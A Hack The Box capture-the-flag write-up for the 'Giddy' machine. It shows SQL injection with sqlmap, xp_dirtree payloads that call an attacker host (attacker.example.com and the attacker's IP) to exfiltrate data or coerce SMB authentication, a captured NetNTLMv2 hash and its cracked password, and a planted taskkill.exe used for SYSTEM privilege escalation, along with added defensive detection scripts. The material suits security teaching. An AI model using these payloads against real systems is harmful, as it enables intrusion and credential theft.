Writeup: Hack The Box - Giddy
Description
- Name: giddy
- IP: 10.10.10.104
- Author: lkys37en
- Difficulty: 6.2/10
Discovery
nmap -sV -sC -Pn -p 1-65535 -T5 --min-rate 1000 --max-retries 5 10.10.10.104
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
443/tcp open ssl/http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| ssl-cert: Subject: commonName=PowerShellWebAccessTestWebSite
| Not valid before: 2018-06-16T21:28:55
|_Not valid after: 2018-09-14T21:28:55
|_ssl-date: 2018-09-14T07:59:14+00:00; +14s from scanner time.
| tls-alpn:
| h2
|_ http/1.1
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=Giddy
| Not valid before: 2018-06-16T01:04:03
|_Not valid after: 2018-12-16T01:04:03
|_ssl-date: 2018-09-14T07:59:15+00:00; +14s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 13s, deviation: 0s, median: 13s
Web directory enumeration on port 80 turned up:
301 - 147B - /mvc -> http://10.10.10.104/mvc/
302 - 157B - /Remote -> /Remote/default.aspx?ReturnUrl=%2fRemote
302 - 157B - /remote -> /Remote/default.aspx?ReturnUrl=%2fremote
Pwn
On /remote (port 443) there is a login page for a Windows PowerShell Web Access service. In /mvc there is a non-production-ready store application.
Running sqlmap against the store page, we immediately found that it is vulnerable to SQL injection:
sqlmap -u "http://10.10.10.104/mvc/Product.aspx?ProductSubCategoryId=8" --threads 10 --random-agent --level 5 --risk 3 --dbms=mssql
Port 3389 and 5985 are used for RDP and Windows Remote Management (WinRM) but we don’t have any credentials to use.
With sqlmap we checked whether any credentials were stored in the Injection database or in the master database used by the store: not a single hash was found (and no shell either).
Searching for a way to read files on the remote file system, we found that MSSQL has a stored procedure that lists subdirectories: xp_dirtree.
EXEC master.sys.xp_dirtree 'C:\Users\stacy\Desktop\',0,1;
Executing this command did not produce any output, so we searched for other uses of the xp_dirtree procedure: Out-of-Band Exploitation.
This is a concept that applies to many classes of vulnerability, such as SQLi, command injection, cross-site scripting and XML External Entity injection.
The idea is fairly simple: instead of capturing the data you want to retrieve and extracting it through Boolean logic, you make the system transmit the data over a protocol such as HTTP, SMB or DNS.
With a SQL injection, this kind of exfiltration can be performed with functions such as:
- MSSQL: master..xp_dirtree
- MySQL: LOAD_FILE()
Supplying a hostname to these functions will cause a DNS lookup to occur; if you control the authoritative name server for a domain, you will see that DNS request in your server's logs. Add to this the fact that the hostname can be generated dynamically, and you can smuggle data out in the subdomain of a domain you control. One thing to note is that hostnames restrict both the characters allowed and the length of each label, so it is worth combining functions like SUBSTR() and HEX(): SUBSTR() keeps each chunk within the maximum length allowed for a subdomain, and HEX() encodes any characters that cannot appear in a hostname.
So the simplest example payload would be:
EXEC master..xp_dirtree '\\attacker.example.com\foo' --
This causes a DNS lookup for attacker.example.com if the system is vulnerable.
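From the defender's side, the same hex-in-subdomain encoding that makes this exfiltration work is also what makes it visible in resolver logs. The following Python scanner is an added example (not part of the original writeup): it walks constructed DNS query-log lines, decodes the leftmost label of each query when it looks like hex-encoded printable text, and reassembles the chunks per client. The log format, client addresses, the attacker.example.com domain and the payload "ProductSubCategory" are all constructed for the example.

```python
import re
from typing import Optional

# Constructed sample lines, loosely modelled on a BIND query log. Only the
# last client sends queries whose leftmost label is hex-encoded data.
SAMPLE_LOG = """\
14-Sep-2018 08:01:10.001 client 10.10.10.50#53011: query: www.example.com IN A +
14-Sep-2018 08:01:11.120 client 10.10.10.50#53012: query: deadbeef.example.com IN A +
14-Sep-2018 08:01:12.101 client 10.10.10.104#49211: query: 50726f64756374537562.attacker.example.com IN A +
14-Sep-2018 08:01:12.233 client 10.10.10.104#49212: query: 43617465676f7279.attacker.example.com IN A +
"""

QUERY_RE = re.compile(r"client (?P<client>[\d.]+)#\d+: query: (?P<qname>\S+) IN (?P<qtype>\S+)")
HEX_LABEL_RE = re.compile(r"^[0-9a-fA-F]+$")
MIN_HEX_LEN = 12    # short hex-looking labels such as "deadbeef" are too common to flag
MAX_LABEL_LEN = 63  # DNS limit per label: the reason exfiltration is chunked with SUBSTR()


def decode_hex_label(label: str) -> Optional[str]:
    """Return the decoded text if the label is even-length hex that decodes to printable ASCII."""
    if len(label) < MIN_HEX_LEN or len(label) > MAX_LABEL_LEN or len(label) % 2:
        return None
    if not HEX_LABEL_RE.match(label):
        return None
    try:
        text = bytes.fromhex(label).decode("ascii")
    except UnicodeDecodeError:
        return None
    return text if text.isprintable() else None


def scan_querylog(log: str) -> dict:
    """Map each client address to the ordered list of decoded chunks it leaked."""
    chunks: dict = {}
    for line in log.splitlines():
        m = QUERY_RE.search(line)
        if not m:
            continue
        # The data label sits at the left; the labels to its right are the controlled domain.
        labels = m.group("qname").rstrip(".").split(".")
        decoded = decode_hex_label(labels[0])
        if decoded is not None:
            chunks.setdefault(m.group("client"), []).append(decoded)
    return chunks


def reassemble(parts: list) -> str:
    """Join chunks in log order; a real stream may need a sequence label to order them."""
    return "".join(parts)


if __name__ == "__main__":
    for client, parts in scan_querylog(SAMPLE_LOG).items():
        print(f"{client}: {len(parts)} hex label(s) -> {reassemble(parts)!r}")
```

The thresholds are deliberately crude: a production detector would add per-client query volume, label entropy and the number of distinct subdomains per zone, but the decode step is the part that turns an alert into evidence of what left the database.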
In our scenario we cannot use DNS exfiltration, because the machine cannot reach an external domain, and with a bare IP it is not possible to make a UDP request such as exfiltrateddata.10.10.10.10; it is possible, however, to use xp_dirtree to trigger an SMB authentication request.
We can't perform an SMB relay attack (CVE-2015-0005), since the machine will not fetch the payload for the reverse shell.
The web store is vulnerable to stacked-query injection, so we can trigger an authentication from Giddy to our machine using impacket (smbserver.py DODO .) and send:
GET /mvc/Product.aspx?ProductSubCategoryId=26;EXEC(%27master..xp_dirtree%20%22\\10.10.XX.XX\c$%22%27); HTTP/1.1
Host: 10.10.10.104
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
The NetNTLMv2 challenge-response captured from Stacy over SMB (in hashcat format) is:
STACY::GIDDY:4141414141414141:1180c58d21933073c98f307c65ea41a1:0101000000000000007265a3de4dd40167ae4f38230da87400000000010010004f004300470041004d00540069004c00020010007a0061006c00780065006a006c007900030010004f004300470041004d00540069004c00040010007a0061006c00780065006a006c00790007000800007265a3de4dd4010600040002000000080030003000000000000000000000000030000023128d4c0270edac6f1a291e9f7f831e122acbee8d0ff5c82a5e415c1f13611e0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310036002e0039003500000000000000000000000000
Cracking the hash with hashcat (option -m 400) we got Stacy's password: xNmWo6272k7x.
Logging in on the /remote endpoint we got an interactive PowerShell session and the first flag.
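The captured line is worth more to an analyst than just crackable material: the NTLMv2 blob after the last colon embeds the client timestamp, the names the responding server presented, and the SPN the client was authenticating to. The following Python parser is an added analysis example (not part of the original writeup) and runs over the exact line shown above; the field layout follows the NTLMv2_CLIENT_CHALLENGE and AV_PAIR structures from MS-NLMP.

```python
import struct
from datetime import datetime, timedelta, timezone

# The NetNTLMv2 line captured in the writeup: user::domain:server_challenge:NTProofStr:blob
CAPTURED = "STACY::GIDDY:4141414141414141:1180c58d21933073c98f307c65ea41a1:0101000000000000007265a3de4dd40167ae4f38230da87400000000010010004f004300470041004d00540069004c00020010007a0061006c00780065006a006c007900030010004f004300470041004d00540069004c00040010007a0061006c00780065006a006c00790007000800007265a3de4dd4010600040002000000080030003000000000000000000000000030000023128d4c0270edac6f1a291e9f7f831e122acbee8d0ff5c82a5e415c1f13611e0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310036002e0039003500000000000000000000000000"

# AV_PAIR ids from MS-NLMP section 2.2.2.1
AV_NAMES = {
    1: "NbComputerName", 2: "NbDomainName", 3: "DnsComputerName",
    4: "DnsDomainName", 5: "DnsTreeName", 6: "Flags", 7: "Timestamp",
    8: "SingleHost", 9: "TargetName", 10: "ChannelBindings",
}
UTF16_IDS = {1, 2, 3, 4, 5, 9}


def filetime_to_datetime(filetime: int) -> datetime:
    """Windows FILETIME (100 ns ticks since 1601-01-01 UTC) to an aware datetime."""
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=filetime // 10)


def parse_av_pairs(data: bytes, pos: int) -> dict:
    """Walk the AV_PAIR list (AvId, AvLen, value) until MsvAvEOL."""
    pairs = {}
    while pos + 4 <= len(data):
        av_id, av_len = struct.unpack_from("<HH", data, pos)
        pos += 4
        if av_id == 0:  # MsvAvEOL terminates the list; trailing padding is ignored
            break
        value = data[pos:pos + av_len]
        pos += av_len
        name = AV_NAMES.get(av_id, f"AvId{av_id}")
        if av_id in UTF16_IDS:
            pairs[name] = value.decode("utf-16-le")
        elif av_id == 7:
            pairs[name] = filetime_to_datetime(struct.unpack("<Q", value)[0])
        elif av_id == 6:
            pairs[name] = struct.unpack("<I", value)[0]
        else:
            pairs[name] = value.hex()
    return pairs


def parse_netntlmv2(line: str) -> dict:
    """Split a hashcat-format NetNTLMv2 line and decode its NTLMv2_CLIENT_CHALLENGE blob."""
    user, _, domain, server_chal, proof, blob_hex = line.strip().split(":")
    blob = bytes.fromhex(blob_hex)
    if blob[0] != 1 or blob[1] != 1:  # RespType / HiRespType
        raise ValueError("not an NTLMv2_CLIENT_CHALLENGE structure")
    timestamp, client_chal = struct.unpack_from("<Q8s", blob, 8)  # after 8 reserved bytes
    return {
        "user": user, "domain": domain,
        "server_challenge": server_chal, "ntproofstr": proof,
        "timestamp": filetime_to_datetime(timestamp),
        "client_challenge": client_chal.hex(),
        "av_pairs": parse_av_pairs(blob, 28),  # 4 + 4 + 8 + 8 + 4 reserved bytes precede the list
    }


def triage(line: str) -> list:
    """Observations an analyst would pull from one captured line."""
    r = parse_netntlmv2(line)
    av = r["av_pairs"]
    notes = [f"{r['domain']}\\{r['user']} authenticated at {r['timestamp']:%Y-%m-%d %H:%M:%S} UTC"]
    if "TargetName" in av:
        notes.append(f"service the client believed it was talking to: {av['TargetName']}")
    if "NbComputerName" in av:
        notes.append(f"server name presented in the challenge: {av['NbComputerName']}")
    if r["server_challenge"].lower() == "41" * 8:
        notes.append("server challenge is a fixed 'AAAAAAAA': a capture server, not a real file server")
    return notes


if __name__ == "__main__":
    for note in triage(CAPTURED):
        print(note)
```

Two fields matter when such a line turns up in an incident: TargetName records the SPN (cifs/host) the victim was coerced into authenticating to, which points straight at the listener, and a server challenge of eight 0x41 bytes is the fixed value impacket's smbserver sends, so its presence in a capture is itself a sign that the "file server" was a credential-harvesting tool.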
We tried to upgrade the shell to a Meterpreter session, but the machine has Windows Defender enabled and PowerShell runs in Constrained Language mode (with PowerShell version 2 not available):
PS C:\Users\Stacy\Downloads>$ExecutionContext.SessionState.LanguageMode
ConstrainedLanguage
In C:\Users\Stacy\Documents we saw a file called unifivideo: UniFi Video is a Ubiquiti service used to control and access video surveillance remotely. The installation path is C:\ProgramData\unifi-video, and from data\system.properties we read the software version:
# unifi-video v3.7.3
#Sat Jun 16 21:58:13 EDT 2018
is_default=false
uuid=e79d440a-62cd-4274-95c3-d746cbb3b817
# app.http.port = 7080
# app.https.port = 7443
# ems.liveflv.port = 6666
# ems.livews.port = 7445
# ems.livewss.port = 7446
# ems.rtmp.enable = true
# ems.rtmp.port = 1935
# ems.rtsp.enable = true
# ems.rtsp.port = 7447
On exploit-db we found a privilege escalation exploit for that version.
Ubiquiti UniFi Video for Windows also ships with a service called Ubiquiti UniFi Video. Its executable avService.exe is placed in the same directory and runs under the NT AUTHORITY\SYSTEM account.
However, the default permissions on the installation folder are inherited from the parent folder and are not explicitly overridden, which allows all users, even unprivileged ones, to append and write files to the application directory:
c:\ProgramData>icacls unifi-video
unifi-video NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
            BUILTIN\Administrators:(I)(OI)(CI)(F)
            CREATOR OWNER:(I)(OI)(CI)(IO)(F)
            BUILTIN\Users:(I)(OI)(CI)(RX)
            BUILTIN\Users:(I)(CI)(WD,AD,WEA,WA)
On start and stop of the service, it tries to load and execute the file C:\ProgramData\unifi-video\taskkill.exe. However, this file does not exist in the application directory by default.
By copying an arbitrary taskkill.exe into the directory as an unprivileged user, it is therefore possible to escalate privileges and execute arbitrary code as NT AUTHORITY\SYSTEM.
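The icacls output above is the whole finding: a low-privileged group holds write rights on a directory a SYSTEM service loads code from, and the (I) flag shows those rights were inherited rather than set deliberately. The following Python check is an added example (not part of the writeup or of the advisory): it parses icacls output for one path and reports ACEs that grant an unprivileged principal write access to the folder itself. It runs over the exact output shown above; the set of "low-privileged" principals and the write-right list are the example's own choices.

```python
import re

# icacls output from the writeup: the path on the first line, one ACE per line,
# continuation lines indented. The closing "Successfully processed ..." summary
# line that icacls prints has no colon and is skipped by the parser.
ICACLS_OUTPUT = """\
unifi-video NT AUTHORITY\\SYSTEM:(I)(OI)(CI)(F)
            BUILTIN\\Administrators:(I)(OI)(CI)(F)
            CREATOR OWNER:(I)(OI)(CI)(IO)(F)
            BUILTIN\\Users:(I)(OI)(CI)(RX)
            BUILTIN\\Users:(I)(CI)(WD,AD,WEA,WA)
"""

# Rights that let a principal create or modify files in the directory.
WRITE_RIGHTS = {"F", "M", "W", "GA", "GW", "WD", "AD", "WA", "WEA", "DC"}
INHERITANCE_FLAGS = {"I", "OI", "CI", "IO", "NP"}
# Groups every local account, privileged or not, is a member of (example's choice).
LOW_PRIV = {
    "BUILTIN\\USERS", "EVERYONE",
    "NT AUTHORITY\\AUTHENTICATED USERS", "NT AUTHORITY\\INTERACTIVE",
}


def parse_icacls(output: str, path: str) -> list:
    """Parse icacls output for a single path into ACE dicts (principal, flags, rights)."""
    aces = []
    for index, line in enumerate(output.splitlines()):
        line = line.strip()
        if index == 0 and line.startswith(path):
            line = line[len(path):].strip()
        if ":" not in line:
            continue
        principal, _, perm = line.rpartition(":")
        groups = re.findall(r"\(([^)]*)\)", perm)
        flags = {g for g in groups if g in INHERITANCE_FLAGS}
        rights = set()
        for g in groups:
            if g not in INHERITANCE_FLAGS:
                rights.update(g.split(","))  # "(WD,AD,WEA,WA)" is one group of several rights
        aces.append({"principal": principal, "flags": flags, "rights": rights})
    return aces


def writable_by_low_priv(output: str, path: str) -> list:
    """ACEs that give an unprivileged principal write access to the directory itself."""
    hits = []
    for ace in parse_icacls(output, path):
        if ace["principal"].upper() not in LOW_PRIV:
            continue
        if "IO" in ace["flags"]:  # inherit-only: applies to children, not to this folder
            continue
        granted = ace["rights"] & WRITE_RIGHTS
        if granted:
            hits.append({
                "principal": ace["principal"],
                "write_rights": sorted(granted),
                "inherited": "I" in ace["flags"],
            })
    return hits


if __name__ == "__main__":
    for hit in writable_by_low_priv(ICACLS_OUTPUT, "unifi-video"):
        origin = "inherited" if hit["inherited"] else "explicit"
        print(f"{hit['principal']} can write here ({origin}): {', '.join(hit['write_rights'])}")
```

Only the second BUILTIN\Users entry is reported: the first grants RX, and CREATOR OWNER's full control is inherit-only. Because the hit is inherited, the fix on the install side is to break inheritance on the application folder and drop the Users write ACE, or better, not to have a SYSTEM service execute a binary from any directory users can write to.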
Initially we wrote a C program for Windows that copies the flag into a folder readable by Stacy:
#include <stdio.h>

/* Built as taskkill.exe and dropped into C:\ProgramData\unifi-video: the
   service runs it as NT AUTHORITY\SYSTEM, so it can read root.txt and copy
   it somewhere Stacy can read. */
int main(void) {
    FILE *stream = NULL, *stream2 = NULL;
    errno_t err;
    char list[50];
    size_t n;

    err = fopen_s(&stream, "C:\\Users\\Administrator\\Desktop\\root.txt", "r");
    if (err != 0) {
        printf("The file root.txt was not opened\n");
        return -1;
    }
    err = fopen_s(&stream2, "C:\\Users\\Stacy\\Desktop\\output.txt", "w+");
    if (err != 0) {
        printf("The file output.txt was not opened\n");
        fclose(stream);
        return -1;
    }
    /* Read up to 50 bytes and write out exactly what was read. The buffer is
       not NUL-terminated, so it must never be passed as a format string. */
    n = fread(list, 1, sizeof list, stream);
    printf("Contents of root.txt = %.*s\n", (int)n, list);
    fwrite(list, 1, n, stream2);
    fclose(stream);
    fclose(stream2);
    return 0;
}
Using Stop-Service and Start-Service on Ubiquiti UniFi Video we triggered the execution of the uploaded taskkill file and read the root flag!
We could also use some AV evasion technique to get a Meterpreter session.